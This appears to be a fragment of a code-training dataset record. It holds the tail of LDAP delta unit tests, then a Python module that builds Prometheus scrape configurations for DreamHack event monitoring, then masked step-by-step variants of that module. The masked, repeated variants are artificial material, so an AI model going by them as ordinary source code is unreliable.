delta.Delete(\"facsimiletelephonenumber\", [\"+1 408 555 9876\"]),\n ],\n )\n\n result = sut.asLDIF()\n\n self.assertEqual(\n b\"\"\"dn: cn=Paula Jensen,ou=Dev Ops,dc=airius,dc=com\nchangetype: modify\nadd: postaladdress\npostaladdress: 123 Anystreet $ Sunnyvale, CA $ 94086\n-\ndelete: description\n-\nreplace: telephonenumber\ntelephonenumber: +1 408 555 1234\ntelephonenumber: +1 408 555 5678\n-\ndelete: facsimiletelephonenumber\nfacsimiletelephonenumber: +1 408 555 9876\n-\n\n\"\"\",\n result,\n )\n\n def testInequalityDiffertnDN(self):\n \"\"\"\n Modify operations for different DN are not equal.\n \"\"\"\n first = delta.ModifyOp(\n \"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")]\n )\n\n second = delta.ModifyOp(\n \"cn=doe,dc=example,dc=com\", [delta.Delete(\"description\")]\n )\n\n self.assertNotEqual(first, second)\n\n def testInequalityDifferentModifications(self):\n \"\"\"\n Modify operations with different modifications are not equal\n \"\"\"\n first = delta.ModifyOp(\"cn=john,dc=example,dc=com\", [delta.Add(\"description\")])\n\n second = delta.ModifyOp(\n \"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")]\n )\n\n self.assertNotEqual(first, second)\n\n def testInequalityNotModifyOP(self):\n \"\"\"\n Modify operations are not equal with other object types.\n \"\"\"\n sut = delta.ModifyOp(\"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")])\n\n self.assertNotEqual(\"cn=john,dc=example,dc=com\", sut)\n\n def testInequalityDiffertnOperations(self):\n \"\"\"\n Modify operations for same DN but different operations are not equal.\n \"\"\"\n first = delta.ModifyOp(\n \"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")]\n )\n second = delta.ModifyOp(\n \"cn=doe,dc=example,dc=com\", [delta.Delete(\"homeDirectory\")]\n )\n\n self.assertNotEqual(first, second)\n\n def testHashEquality(self):\n \"\"\"\n Modify operations can be hashed and equal objects have the same\n hash.\n \"\"\"\n first = delta.ModifyOp(\n 
\"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")]\n )\n\n second = delta.ModifyOp(\n \"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")]\n )\n\n self.assertEqual(first, second)\n self.assertEqual(\n first.asLDIF(),\n second.asLDIF(),\n \"LDIF equality is a precondition for valid hash values\",\n )\n self.assertEqual(hash(first), hash(second))\n\n def testHashInequality(self):\n \"\"\"\n Different modify operations have different hash values.\n \"\"\"\n first = delta.ModifyOp(\n \"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")]\n )\n\n second = delta.ModifyOp(\n \"cn=john,dc=example,dc=com\", [delta.Delete(\"homeDirectory\")]\n )\n\n self.assertNotEqual(first.asLDIF(), second.asLDIF())\n self.assertNotEqual(hash(first), hash(second))\n\n def testModifyOp_DNNotFound(self):\n \"\"\"\n If fail to modify when the RDN does not exists.\n \"\"\"\n root = self.getRoot()\n sut = delta.ModifyOp(\n \"cn=nope,dc=example,dc=com\",\n [delta.Add(\"foo\", [\"bar\"])],\n )\n\n deferred = sut.patch(root)\n\n failure = self.failureResultOf(deferred)\n self.assertIsInstance(failure.value, ldaperrors.LDAPNoSuchObject)\n\n def testRepr(self):\n \"\"\"\n Getting string representation\n \"\"\"\n sut = delta.ModifyOp(\"cn=john,dc=example,dc=com\", [delta.Delete(\"description\")])\n\n self.assertEqual(\n repr(sut),\n \"ModifyOp(dn='cn=john,dc=example,dc=com', \"\n \"modifications=[Delete('description', [])])\",\n )\n\n\nclass TestModificationComparison(unittest.TestCase):\n def testEquality_Add_True(self):\n a = delta.Add(\"k\", [\"b\", \"c\", \"d\"])\n b = delta.Add(\"k\", [\"b\", \"c\", \"d\"])\n self.assertEqual(a, b)\n\n def testEquality_AddVsDelete_False(self):\n a = delta.Add(\"k\", [\"b\", \"c\", \"d\"])\n b = delta.Delete(\"k\", [\"b\", \"c\", \"d\"])\n self.assertNotEqual(a, b)\n\n def testEquality_AttributeSet_False(self):\n a = delta.Add(\"k\", [\"b\", \"c\", \"d\"])\n b = attributeset.LDAPAttributeSet(\"k\", [\"b\", \"c\", \"d\"])\n 
self.assertNotEqual(a, b)\n\n def testEquality_List_False(self):\n a = delta.Add(\"k\", [\"b\", \"c\", \"d\"])\n b = [\"b\", \"c\", \"d\"]\n self.assertNotEqual(a, b)\n",
"step-ids": [
43,
46,
52,
54,
63
]
}
|
[
43,
46,
52,
54,
63
] |
# Copyright 2018 dhtech
#
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file
import lib
import urlparse
import yaml
# Machine-local package manifest consumed by generate_backend() to discover
# services that opt into monitoring.
MANIFEST_PATH = '/etc/manifest'
# Placeholder for HTTP basic-auth credentials.
# NOTE(review): appears unused in this module (generate_backend reads the
# secret directly via lib.read_secret) — confirm before removing.
HTTP_BASIC_AUTH = None
def blackbox(name, backend, targets, params,
             target='target', path='/probe', labels=None):
    """Build a Prometheus scrape config that probes `targets` indirectly
    through a blackbox-style exporter running at `backend`.

    Args:
        name: job_name for the resulting scrape config.
        backend: host:port of the exporter that performs the actual probe.
        targets: iterable of addresses to probe; hosts whose OS is banned
            (currently Debian) are filtered out.
        params: extra HTTP query parameters passed to the probe endpoint.
        target: name of the query parameter that carries the probed address.
        path: metrics path on the exporter.
        labels: optional static labels applied to every target.

    Returns:
        A scrape_config dict suitable for inclusion in 'scrape_configs'.
    """
    labels = {} if labels is None else labels
    # Strip banned OSes
    banned_oses = ['debian']
    filtered_targets = [x for x in targets if lib.get_os(x) not in banned_oses]
    return {
        'job_name': name,
        'metrics_path': path,
        'params': params,
        'static_configs': [{
            'targets': sorted(filtered_targets),
            'labels': labels
        }],
        'relabel_configs': [{
            # Copy the scraped address into the probe query parameter,
            # dropping an explicit ':80' port suffix if present.
            # BUG FIX: the previous regex '(.*)(:80)?' never stripped ':80'
            # because the greedy first group consumed the entire address and
            # the optional group matched empty; a non-greedy first group lets
            # the ':80' suffix be captured (and discarded) as intended.
            'source_labels': ['__address__'],
            'regex': '(.*?)(:80)?',
            'target_label': '__param_%s' % target,
            'replacement': '${1}',
        }, {
            # Expose the probed address as the 'instance' label.
            'source_labels': ['__param_%s' % target],
            'regex': '(.*)',
            'target_label': 'instance',
            'replacement': '${1}',
        }, {
            # Finally, point the actual HTTP scrape at the exporter backend.
            'source_labels': [],
            'regex': '.*',
            'target_label': '__address__',
            'replacement': backend,
        }]
    }
def generate_backend(host, local_services):
    """Assemble the full Prometheus 'scrape_configs' list for `host`.

    Starts from the caller-provided `local_services` scrape configs, then:
      1. reads the package manifest (MANIFEST_PATH) and adds a scrape job
         for every package that declares a 'monitor' section;
      2. adds per-network-layer SNMP and SSH blackbox probe jobs;
      3. adds file-based service discovery for external targets;
      4. adds event-specific jobs (puppet runs, vCenter exporter);
      5. appends a metric relabel rule so every metric carries a port-free
         'host' label.

    Args:
        host: FQDN of the Prometheus host being configured.
        local_services: list of pre-built scrape_config dicts to include.

    Returns:
        dict with a single 'scrape_configs' key.
    """
    scrape_configs = []
    scrape_configs.extend(local_services)
    domain = lib.get_domain(host)
    # Shared credentials for services that request authenticated scrapes.
    basic_auth = lib.read_secret('services/monitoring:login')
    # Find services that wants to be monitored
    # NOTE(review): yaml.load without an explicit Loader can execute
    # arbitrary constructors; the manifest is machine-local, but consider
    # yaml.safe_load.
    manifest = yaml.load(file(MANIFEST_PATH).read())
    for package, spec in manifest['packages'].iteritems():
        if spec is None or 'monitor' not in spec:
            continue
        # 'url' may be a single string or a dict of {id: url}; normalize to
        # a dict whose (optional) key suffixes the job name below.
        urls = (spec['monitor']['url']
                if isinstance(spec['monitor']['url'], dict) else
                {None: spec['monitor']['url']})
        for url_id, url_str in urls.iteritems():
            url = urlparse.urlparse(url_str)
            targets = []
            # Every node carrying this package becomes a target, keeping the
            # URL's explicit port if one was given.
            for target in sorted(
                    lib.get_nodes_with_package(package, domain).keys()):
                targets.append(target if url.port is None else '%s:%d' % (
                    target, url.port))
            scrape_config = {
                'job_name': package + ('-%s' % url_id if url_id else ''),
                'metrics_path': url.path,
                'scheme': url.scheme,
                'static_configs': [
                    {'targets': sorted(targets)}
                ],
            }
            if 'interval' in spec['monitor']:
                scrape_config['scrape_interval'] = spec['monitor']['interval']
            if 'labels' in spec['monitor']:
                scrape_config['static_configs'][0]['labels'] = spec['monitor']['labels']
            # Only allow authentication over https
            if spec['monitor'].get('auth', False) and url.scheme == 'https':
                scrape_config['basic_auth'] = basic_auth
            scrape_configs.append(scrape_config)
    # Layer specific monitoring
    layers = lib.get_layers(domain)
    snmp_nodes = {}
    ssh_nodes = {}
    # Per layer, collect probe targets minus hosts that opted out via the
    # 'no-snmp' / 'no-ssh' options.
    for layer in layers:
        hosts = lib.get_nodes_with_layer(layer, domain)
        snmp_mute = lib.get_nodes_with_layer(layer, domain, 'no-snmp')
        ssh_mute = lib.get_nodes_with_layer(layer, domain, 'no-ssh')
        snmp_nodes[layer] = list(set(hosts) - set(snmp_mute))
        # SSH probes always talk to port 22.
        ssh_nodes[layer] = [x+':22' for x in set(hosts) - set(ssh_mute)]
    # SNMP
    for layer in layers:
        # TODO(bluecmd): Use options for this
        if layer == 'access':
            snmp_host = 'snmp2.event.dreamhack.se'
        else:
            snmp_host = 'snmp1.event.dreamhack.se'
        snmp = blackbox(
            'snmp_%s' % layer, snmp_host,
            snmp_nodes[layer], {'layer': [layer]}, labels={
                'layer': layer})
        snmp['scrape_interval'] = '30s'
        snmp['scrape_timeout'] = '30s'
        scrape_configs.append(snmp)
    # SSH
    for layer in layers:
        for ssh_host in ['jumpgate1', 'jumpgate2', 'rancid']:
            # Each probe host runs a blackbox exporter on port 9115.
            fqdn = ssh_host + '.event.dreamhack.se:9115'
            ssh = blackbox(
                'ssh_%s_%s' % (layer, ssh_host), fqdn,
                ssh_nodes[layer], {'module': ['ssh_banner']}, labels={'layer': layer})
            ssh['scrape_interval'] = '30s'
            ssh['scrape_timeout'] = '30s'
            scrape_configs.append(ssh)
    # Add external service-discovery
    external = {
        'job_name': 'external',
        'file_sd_configs': [{
            'files': ['/etc/prometheus/external/*.yaml'],
        }],
    }
    scrape_configs.append(external)
    if host.endswith('.event.dreamhack.se'):
        # Event should scrape puppet.tech.dreamhack.se to get information about
        # puppet runs
        puppet = {
            'job_name': 'puppet_runs',
            'metrics_path': '/metrics',
            'scrape_interval': '60s',
            'scrape_timeout': '55s',
            'static_configs': [{
                'targets': ['puppet.tech.dreamhack.se:9100'],
            }],
        }
        scrape_configs.append(puppet)
    # vCenter exporter is scraped unconditionally.
    vcenter = {
        'job_name': 'vmware_vcenter',
        'metrics_path': '/metrics',
        'scrape_interval': '60s',
        'scrape_timeout': '55s',
        'static_configs': [{
            'targets': ['provision.event.dreamhack.se:9272'],
        }],
    }
    scrape_configs.append(vcenter)
    # Make sure that all metrics have a host label.
    # This rule uses the existing host label if there is one,
    # stripping of the port (which shouldn't be part of the host label anyway)
    # *or* if that label does not exist it uses the instance label
    # (again stripping of the port)
    relabel = {
        'regex': r':?([^:]*):?.*',
        'separator': ':',
        'replacement': '${1}',
        'source_labels': ['host', 'instance'],
        'target_label': 'host',
    }
    mrc = 'metric_relabel_configs'
    # Append the rule after any pre-existing metric relabel rules so it
    # runs last and wins.
    for scrape in scrape_configs:
        if mrc in scrape:
            scrape[mrc].append(relabel)
        else:
            scrape[mrc] = [relabel]
    return {'scrape_configs': scrape_configs}
def requires(host, *args):
    """Declare the services this generator depends on.

    The monitoring frontend is served behind the LDAP-authenticated Apache
    instance, which is the sole dependency regardless of host.
    """
    dependencies = ['apache(ldap)']
    return dependencies
def generate(host, *args):
    """Produce the configuration blob for this host's Prometheus setup."""
    # Prometheus always scrapes itself over plain HTTP on the default port.
    self_scrape = {
        'job_name': 'prometheus',
        'scheme': 'http',
        'static_configs': [{'targets': ['localhost:9090']}]}
    backend = generate_backend(host, [self_scrape])
    # Get current event
    backend['current_event'] = lib.get_current_event()
    return {'prometheus': backend}
# vim: ts=4: sts=4: sw=4: expandtab
|
normal
|
{
"blob_id": "f489058c922d405754ad32a737f67bc03c08772b",
"index": 701,
"step-1": "<mask token>\n\n\ndef blackbox(name, backend, targets, params, target='target', path='/probe',\n labels=None):\n labels = {} if labels is None else labels\n banned_oses = ['debian']\n filtered_targets = [x for x in targets if lib.get_os(x) not in banned_oses]\n return {'job_name': name, 'metrics_path': path, 'params': params,\n 'static_configs': [{'targets': sorted(filtered_targets), 'labels':\n labels}], 'relabel_configs': [{'source_labels': ['__address__'],\n 'regex': '(.*)(:80)?', 'target_label': '__param_%s' % target,\n 'replacement': '${1}'}, {'source_labels': ['__param_%s' % target],\n 'regex': '(.*)', 'target_label': 'instance', 'replacement': '${1}'},\n {'source_labels': [], 'regex': '.*', 'target_label': '__address__',\n 'replacement': backend}]}\n\n\ndef generate_backend(host, local_services):\n scrape_configs = []\n scrape_configs.extend(local_services)\n domain = lib.get_domain(host)\n basic_auth = lib.read_secret('services/monitoring:login')\n manifest = yaml.load(file(MANIFEST_PATH).read())\n for package, spec in manifest['packages'].iteritems():\n if spec is None or 'monitor' not in spec:\n continue\n urls = spec['monitor']['url'] if isinstance(spec['monitor']['url'],\n dict) else {None: spec['monitor']['url']}\n for url_id, url_str in urls.iteritems():\n url = urlparse.urlparse(url_str)\n targets = []\n for target in sorted(lib.get_nodes_with_package(package, domain\n ).keys()):\n targets.append(target if url.port is None else '%s:%d' % (\n target, url.port))\n scrape_config = {'job_name': package + ('-%s' % url_id if\n url_id else ''), 'metrics_path': url.path, 'scheme': url.\n scheme, 'static_configs': [{'targets': sorted(targets)}]}\n if 'interval' in spec['monitor']:\n scrape_config['scrape_interval'] = spec['monitor']['interval']\n if 'labels' in spec['monitor']:\n scrape_config['static_configs'][0]['labels'] = spec['monitor'][\n 'labels']\n if spec['monitor'].get('auth', False) and url.scheme == 'https':\n 
scrape_config['basic_auth'] = basic_auth\n scrape_configs.append(scrape_config)\n layers = lib.get_layers(domain)\n snmp_nodes = {}\n ssh_nodes = {}\n for layer in layers:\n hosts = lib.get_nodes_with_layer(layer, domain)\n snmp_mute = lib.get_nodes_with_layer(layer, domain, 'no-snmp')\n ssh_mute = lib.get_nodes_with_layer(layer, domain, 'no-ssh')\n snmp_nodes[layer] = list(set(hosts) - set(snmp_mute))\n ssh_nodes[layer] = [(x + ':22') for x in set(hosts) - set(ssh_mute)]\n for layer in layers:\n if layer == 'access':\n snmp_host = 'snmp2.event.dreamhack.se'\n else:\n snmp_host = 'snmp1.event.dreamhack.se'\n snmp = blackbox('snmp_%s' % layer, snmp_host, snmp_nodes[layer], {\n 'layer': [layer]}, labels={'layer': layer})\n snmp['scrape_interval'] = '30s'\n snmp['scrape_timeout'] = '30s'\n scrape_configs.append(snmp)\n for layer in layers:\n for ssh_host in ['jumpgate1', 'jumpgate2', 'rancid']:\n fqdn = ssh_host + '.event.dreamhack.se:9115'\n ssh = blackbox('ssh_%s_%s' % (layer, ssh_host), fqdn, ssh_nodes\n [layer], {'module': ['ssh_banner']}, labels={'layer': layer})\n ssh['scrape_interval'] = '30s'\n ssh['scrape_timeout'] = '30s'\n scrape_configs.append(ssh)\n external = {'job_name': 'external', 'file_sd_configs': [{'files': [\n '/etc/prometheus/external/*.yaml']}]}\n scrape_configs.append(external)\n if host.endswith('.event.dreamhack.se'):\n puppet = {'job_name': 'puppet_runs', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s',\n 'static_configs': [{'targets': ['puppet.tech.dreamhack.se:9100']}]}\n scrape_configs.append(puppet)\n vcenter = {'job_name': 'vmware_vcenter', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s', 'static_configs':\n [{'targets': ['provision.event.dreamhack.se:9272']}]}\n scrape_configs.append(vcenter)\n relabel = {'regex': ':?([^:]*):?.*', 'separator': ':', 'replacement':\n '${1}', 'source_labels': ['host', 'instance'], 'target_label': 'host'}\n mrc = 'metric_relabel_configs'\n for 
scrape in scrape_configs:\n if mrc in scrape:\n scrape[mrc].append(relabel)\n else:\n scrape[mrc] = [relabel]\n return {'scrape_configs': scrape_configs}\n\n\n<mask token>\n\n\ndef generate(host, *args):\n info = {}\n local_targets = []\n local_targets.append({'job_name': 'prometheus', 'scheme': 'http',\n 'static_configs': [{'targets': ['localhost:9090']}]})\n info['prometheus'] = generate_backend(host, local_targets)\n info['prometheus']['current_event'] = lib.get_current_event()\n return info\n",
"step-2": "<mask token>\n\n\ndef blackbox(name, backend, targets, params, target='target', path='/probe',\n labels=None):\n labels = {} if labels is None else labels\n banned_oses = ['debian']\n filtered_targets = [x for x in targets if lib.get_os(x) not in banned_oses]\n return {'job_name': name, 'metrics_path': path, 'params': params,\n 'static_configs': [{'targets': sorted(filtered_targets), 'labels':\n labels}], 'relabel_configs': [{'source_labels': ['__address__'],\n 'regex': '(.*)(:80)?', 'target_label': '__param_%s' % target,\n 'replacement': '${1}'}, {'source_labels': ['__param_%s' % target],\n 'regex': '(.*)', 'target_label': 'instance', 'replacement': '${1}'},\n {'source_labels': [], 'regex': '.*', 'target_label': '__address__',\n 'replacement': backend}]}\n\n\ndef generate_backend(host, local_services):\n scrape_configs = []\n scrape_configs.extend(local_services)\n domain = lib.get_domain(host)\n basic_auth = lib.read_secret('services/monitoring:login')\n manifest = yaml.load(file(MANIFEST_PATH).read())\n for package, spec in manifest['packages'].iteritems():\n if spec is None or 'monitor' not in spec:\n continue\n urls = spec['monitor']['url'] if isinstance(spec['monitor']['url'],\n dict) else {None: spec['monitor']['url']}\n for url_id, url_str in urls.iteritems():\n url = urlparse.urlparse(url_str)\n targets = []\n for target in sorted(lib.get_nodes_with_package(package, domain\n ).keys()):\n targets.append(target if url.port is None else '%s:%d' % (\n target, url.port))\n scrape_config = {'job_name': package + ('-%s' % url_id if\n url_id else ''), 'metrics_path': url.path, 'scheme': url.\n scheme, 'static_configs': [{'targets': sorted(targets)}]}\n if 'interval' in spec['monitor']:\n scrape_config['scrape_interval'] = spec['monitor']['interval']\n if 'labels' in spec['monitor']:\n scrape_config['static_configs'][0]['labels'] = spec['monitor'][\n 'labels']\n if spec['monitor'].get('auth', False) and url.scheme == 'https':\n 
scrape_config['basic_auth'] = basic_auth\n scrape_configs.append(scrape_config)\n layers = lib.get_layers(domain)\n snmp_nodes = {}\n ssh_nodes = {}\n for layer in layers:\n hosts = lib.get_nodes_with_layer(layer, domain)\n snmp_mute = lib.get_nodes_with_layer(layer, domain, 'no-snmp')\n ssh_mute = lib.get_nodes_with_layer(layer, domain, 'no-ssh')\n snmp_nodes[layer] = list(set(hosts) - set(snmp_mute))\n ssh_nodes[layer] = [(x + ':22') for x in set(hosts) - set(ssh_mute)]\n for layer in layers:\n if layer == 'access':\n snmp_host = 'snmp2.event.dreamhack.se'\n else:\n snmp_host = 'snmp1.event.dreamhack.se'\n snmp = blackbox('snmp_%s' % layer, snmp_host, snmp_nodes[layer], {\n 'layer': [layer]}, labels={'layer': layer})\n snmp['scrape_interval'] = '30s'\n snmp['scrape_timeout'] = '30s'\n scrape_configs.append(snmp)\n for layer in layers:\n for ssh_host in ['jumpgate1', 'jumpgate2', 'rancid']:\n fqdn = ssh_host + '.event.dreamhack.se:9115'\n ssh = blackbox('ssh_%s_%s' % (layer, ssh_host), fqdn, ssh_nodes\n [layer], {'module': ['ssh_banner']}, labels={'layer': layer})\n ssh['scrape_interval'] = '30s'\n ssh['scrape_timeout'] = '30s'\n scrape_configs.append(ssh)\n external = {'job_name': 'external', 'file_sd_configs': [{'files': [\n '/etc/prometheus/external/*.yaml']}]}\n scrape_configs.append(external)\n if host.endswith('.event.dreamhack.se'):\n puppet = {'job_name': 'puppet_runs', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s',\n 'static_configs': [{'targets': ['puppet.tech.dreamhack.se:9100']}]}\n scrape_configs.append(puppet)\n vcenter = {'job_name': 'vmware_vcenter', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s', 'static_configs':\n [{'targets': ['provision.event.dreamhack.se:9272']}]}\n scrape_configs.append(vcenter)\n relabel = {'regex': ':?([^:]*):?.*', 'separator': ':', 'replacement':\n '${1}', 'source_labels': ['host', 'instance'], 'target_label': 'host'}\n mrc = 'metric_relabel_configs'\n for 
scrape in scrape_configs:\n if mrc in scrape:\n scrape[mrc].append(relabel)\n else:\n scrape[mrc] = [relabel]\n return {'scrape_configs': scrape_configs}\n\n\ndef requires(host, *args):\n return ['apache(ldap)']\n\n\ndef generate(host, *args):\n info = {}\n local_targets = []\n local_targets.append({'job_name': 'prometheus', 'scheme': 'http',\n 'static_configs': [{'targets': ['localhost:9090']}]})\n info['prometheus'] = generate_backend(host, local_targets)\n info['prometheus']['current_event'] = lib.get_current_event()\n return info\n",
"step-3": "<mask token>\nMANIFEST_PATH = '/etc/manifest'\nHTTP_BASIC_AUTH = None\n\n\ndef blackbox(name, backend, targets, params, target='target', path='/probe',\n labels=None):\n labels = {} if labels is None else labels\n banned_oses = ['debian']\n filtered_targets = [x for x in targets if lib.get_os(x) not in banned_oses]\n return {'job_name': name, 'metrics_path': path, 'params': params,\n 'static_configs': [{'targets': sorted(filtered_targets), 'labels':\n labels}], 'relabel_configs': [{'source_labels': ['__address__'],\n 'regex': '(.*)(:80)?', 'target_label': '__param_%s' % target,\n 'replacement': '${1}'}, {'source_labels': ['__param_%s' % target],\n 'regex': '(.*)', 'target_label': 'instance', 'replacement': '${1}'},\n {'source_labels': [], 'regex': '.*', 'target_label': '__address__',\n 'replacement': backend}]}\n\n\ndef generate_backend(host, local_services):\n scrape_configs = []\n scrape_configs.extend(local_services)\n domain = lib.get_domain(host)\n basic_auth = lib.read_secret('services/monitoring:login')\n manifest = yaml.load(file(MANIFEST_PATH).read())\n for package, spec in manifest['packages'].iteritems():\n if spec is None or 'monitor' not in spec:\n continue\n urls = spec['monitor']['url'] if isinstance(spec['monitor']['url'],\n dict) else {None: spec['monitor']['url']}\n for url_id, url_str in urls.iteritems():\n url = urlparse.urlparse(url_str)\n targets = []\n for target in sorted(lib.get_nodes_with_package(package, domain\n ).keys()):\n targets.append(target if url.port is None else '%s:%d' % (\n target, url.port))\n scrape_config = {'job_name': package + ('-%s' % url_id if\n url_id else ''), 'metrics_path': url.path, 'scheme': url.\n scheme, 'static_configs': [{'targets': sorted(targets)}]}\n if 'interval' in spec['monitor']:\n scrape_config['scrape_interval'] = spec['monitor']['interval']\n if 'labels' in spec['monitor']:\n scrape_config['static_configs'][0]['labels'] = spec['monitor'][\n 'labels']\n if spec['monitor'].get('auth', 
False) and url.scheme == 'https':\n scrape_config['basic_auth'] = basic_auth\n scrape_configs.append(scrape_config)\n layers = lib.get_layers(domain)\n snmp_nodes = {}\n ssh_nodes = {}\n for layer in layers:\n hosts = lib.get_nodes_with_layer(layer, domain)\n snmp_mute = lib.get_nodes_with_layer(layer, domain, 'no-snmp')\n ssh_mute = lib.get_nodes_with_layer(layer, domain, 'no-ssh')\n snmp_nodes[layer] = list(set(hosts) - set(snmp_mute))\n ssh_nodes[layer] = [(x + ':22') for x in set(hosts) - set(ssh_mute)]\n for layer in layers:\n if layer == 'access':\n snmp_host = 'snmp2.event.dreamhack.se'\n else:\n snmp_host = 'snmp1.event.dreamhack.se'\n snmp = blackbox('snmp_%s' % layer, snmp_host, snmp_nodes[layer], {\n 'layer': [layer]}, labels={'layer': layer})\n snmp['scrape_interval'] = '30s'\n snmp['scrape_timeout'] = '30s'\n scrape_configs.append(snmp)\n for layer in layers:\n for ssh_host in ['jumpgate1', 'jumpgate2', 'rancid']:\n fqdn = ssh_host + '.event.dreamhack.se:9115'\n ssh = blackbox('ssh_%s_%s' % (layer, ssh_host), fqdn, ssh_nodes\n [layer], {'module': ['ssh_banner']}, labels={'layer': layer})\n ssh['scrape_interval'] = '30s'\n ssh['scrape_timeout'] = '30s'\n scrape_configs.append(ssh)\n external = {'job_name': 'external', 'file_sd_configs': [{'files': [\n '/etc/prometheus/external/*.yaml']}]}\n scrape_configs.append(external)\n if host.endswith('.event.dreamhack.se'):\n puppet = {'job_name': 'puppet_runs', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s',\n 'static_configs': [{'targets': ['puppet.tech.dreamhack.se:9100']}]}\n scrape_configs.append(puppet)\n vcenter = {'job_name': 'vmware_vcenter', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s', 'static_configs':\n [{'targets': ['provision.event.dreamhack.se:9272']}]}\n scrape_configs.append(vcenter)\n relabel = {'regex': ':?([^:]*):?.*', 'separator': ':', 'replacement':\n '${1}', 'source_labels': ['host', 'instance'], 'target_label': 'host'}\n 
mrc = 'metric_relabel_configs'\n for scrape in scrape_configs:\n if mrc in scrape:\n scrape[mrc].append(relabel)\n else:\n scrape[mrc] = [relabel]\n return {'scrape_configs': scrape_configs}\n\n\ndef requires(host, *args):\n return ['apache(ldap)']\n\n\ndef generate(host, *args):\n info = {}\n local_targets = []\n local_targets.append({'job_name': 'prometheus', 'scheme': 'http',\n 'static_configs': [{'targets': ['localhost:9090']}]})\n info['prometheus'] = generate_backend(host, local_targets)\n info['prometheus']['current_event'] = lib.get_current_event()\n return info\n",
"step-4": "import lib\nimport urlparse\nimport yaml\nMANIFEST_PATH = '/etc/manifest'\nHTTP_BASIC_AUTH = None\n\n\ndef blackbox(name, backend, targets, params, target='target', path='/probe',\n labels=None):\n labels = {} if labels is None else labels\n banned_oses = ['debian']\n filtered_targets = [x for x in targets if lib.get_os(x) not in banned_oses]\n return {'job_name': name, 'metrics_path': path, 'params': params,\n 'static_configs': [{'targets': sorted(filtered_targets), 'labels':\n labels}], 'relabel_configs': [{'source_labels': ['__address__'],\n 'regex': '(.*)(:80)?', 'target_label': '__param_%s' % target,\n 'replacement': '${1}'}, {'source_labels': ['__param_%s' % target],\n 'regex': '(.*)', 'target_label': 'instance', 'replacement': '${1}'},\n {'source_labels': [], 'regex': '.*', 'target_label': '__address__',\n 'replacement': backend}]}\n\n\ndef generate_backend(host, local_services):\n scrape_configs = []\n scrape_configs.extend(local_services)\n domain = lib.get_domain(host)\n basic_auth = lib.read_secret('services/monitoring:login')\n manifest = yaml.load(file(MANIFEST_PATH).read())\n for package, spec in manifest['packages'].iteritems():\n if spec is None or 'monitor' not in spec:\n continue\n urls = spec['monitor']['url'] if isinstance(spec['monitor']['url'],\n dict) else {None: spec['monitor']['url']}\n for url_id, url_str in urls.iteritems():\n url = urlparse.urlparse(url_str)\n targets = []\n for target in sorted(lib.get_nodes_with_package(package, domain\n ).keys()):\n targets.append(target if url.port is None else '%s:%d' % (\n target, url.port))\n scrape_config = {'job_name': package + ('-%s' % url_id if\n url_id else ''), 'metrics_path': url.path, 'scheme': url.\n scheme, 'static_configs': [{'targets': sorted(targets)}]}\n if 'interval' in spec['monitor']:\n scrape_config['scrape_interval'] = spec['monitor']['interval']\n if 'labels' in spec['monitor']:\n scrape_config['static_configs'][0]['labels'] = spec['monitor'][\n 'labels']\n if 
spec['monitor'].get('auth', False) and url.scheme == 'https':\n scrape_config['basic_auth'] = basic_auth\n scrape_configs.append(scrape_config)\n layers = lib.get_layers(domain)\n snmp_nodes = {}\n ssh_nodes = {}\n for layer in layers:\n hosts = lib.get_nodes_with_layer(layer, domain)\n snmp_mute = lib.get_nodes_with_layer(layer, domain, 'no-snmp')\n ssh_mute = lib.get_nodes_with_layer(layer, domain, 'no-ssh')\n snmp_nodes[layer] = list(set(hosts) - set(snmp_mute))\n ssh_nodes[layer] = [(x + ':22') for x in set(hosts) - set(ssh_mute)]\n for layer in layers:\n if layer == 'access':\n snmp_host = 'snmp2.event.dreamhack.se'\n else:\n snmp_host = 'snmp1.event.dreamhack.se'\n snmp = blackbox('snmp_%s' % layer, snmp_host, snmp_nodes[layer], {\n 'layer': [layer]}, labels={'layer': layer})\n snmp['scrape_interval'] = '30s'\n snmp['scrape_timeout'] = '30s'\n scrape_configs.append(snmp)\n for layer in layers:\n for ssh_host in ['jumpgate1', 'jumpgate2', 'rancid']:\n fqdn = ssh_host + '.event.dreamhack.se:9115'\n ssh = blackbox('ssh_%s_%s' % (layer, ssh_host), fqdn, ssh_nodes\n [layer], {'module': ['ssh_banner']}, labels={'layer': layer})\n ssh['scrape_interval'] = '30s'\n ssh['scrape_timeout'] = '30s'\n scrape_configs.append(ssh)\n external = {'job_name': 'external', 'file_sd_configs': [{'files': [\n '/etc/prometheus/external/*.yaml']}]}\n scrape_configs.append(external)\n if host.endswith('.event.dreamhack.se'):\n puppet = {'job_name': 'puppet_runs', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s',\n 'static_configs': [{'targets': ['puppet.tech.dreamhack.se:9100']}]}\n scrape_configs.append(puppet)\n vcenter = {'job_name': 'vmware_vcenter', 'metrics_path': '/metrics',\n 'scrape_interval': '60s', 'scrape_timeout': '55s', 'static_configs':\n [{'targets': ['provision.event.dreamhack.se:9272']}]}\n scrape_configs.append(vcenter)\n relabel = {'regex': ':?([^:]*):?.*', 'separator': ':', 'replacement':\n '${1}', 'source_labels': ['host', 
'instance'], 'target_label': 'host'}\n mrc = 'metric_relabel_configs'\n for scrape in scrape_configs:\n if mrc in scrape:\n scrape[mrc].append(relabel)\n else:\n scrape[mrc] = [relabel]\n return {'scrape_configs': scrape_configs}\n\n\ndef requires(host, *args):\n return ['apache(ldap)']\n\n\ndef generate(host, *args):\n info = {}\n local_targets = []\n local_targets.append({'job_name': 'prometheus', 'scheme': 'http',\n 'static_configs': [{'targets': ['localhost:9090']}]})\n info['prometheus'] = generate_backend(host, local_targets)\n info['prometheus']['current_event'] = lib.get_current_event()\n return info\n",
